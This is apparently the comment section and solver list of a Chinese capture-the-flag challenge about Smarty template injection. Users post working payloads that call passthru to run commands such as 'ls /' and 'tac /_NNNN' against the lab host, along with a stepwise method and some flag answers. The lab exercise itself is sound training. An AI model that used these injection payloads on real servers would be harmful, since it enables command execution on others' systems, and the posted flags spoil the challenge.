评分(13)
解题动态
22222222221 攻破了该题 8小时前
wes 攻破了该题 8小时前
李逍遥逛霍格沃茨 攻破了该题 1天前
AzKanna 攻破了该题 4天前
SkyAsh 攻破了该题 9天前
luck1219 攻破了该题 10天前
Niko_83c 攻破了该题 11天前
WindZQ 攻破了该题 11天前
陌兮li 攻破了该题 12天前
棋子小呆不卡 攻破了该题 13天前
tiger1cyd 攻破了该题 13天前
pigpigG6768 攻破了该题 16天前
ctfcaiji9527 攻破了该题 16天前
ikunqq 攻破了该题 18天前
if..... 攻破了该题 18天前
fbl 攻破了该题 18天前
20230302248 攻破了该题 18天前
zmjjkk001 攻破了该题 18天前
dask 攻破了该题 18天前
评论
fuhaiyan 23天前
举报
?a={{passthru('more ../../../*|grep fla')}}
对对对对对对对对 2月前
举报
?key={{passthru(%27tac%20/_4427%27)}}
anony 6月前
举报
flag{********}
人闲桂花落 7月前
举报
tac命令读取也可
docker0w 1年前
举报
1. 随意构造URL参数获取源代码信息 ?test=test 2. 根据源代码得知使用Smarty 并搜索得知存在模板注入漏洞 3. 根据已过滤函数,使用passthru函数即可回显 4. 使用passthru执行命令 ls -a / 得到根据下存在start.sh 脚本信息 5. 根据脚本信息得知flag为随机生成在根路径下 且使用_下划线文件明名 6. 使用show_source获
bx33661 1年前
举报
?key={passthru("tac%20/_28710")}
yun20231227 1年前
举报
?key={{passthru('ls /')}}
xinkuang 1年前
举报
http://114.67.175.224:13208/?a={if%20passthru(%22more%20/_30010%22)}{/if}
Daniel2023 1年前
举报
flag{0e54d64e616af92957ddbb6c6ea37c5f}
一路奔腾 2年前
举报
?a={passthru("ls -al /")}找到特殊的一样_24542这样的文件,?f={passthru("tac%20/_13075")}查看文件内容得到flag。参考:https://zhuanlan.zhihu.com/p/401583380,,,,https://blog.csdn.net/m_de_g/article/details/120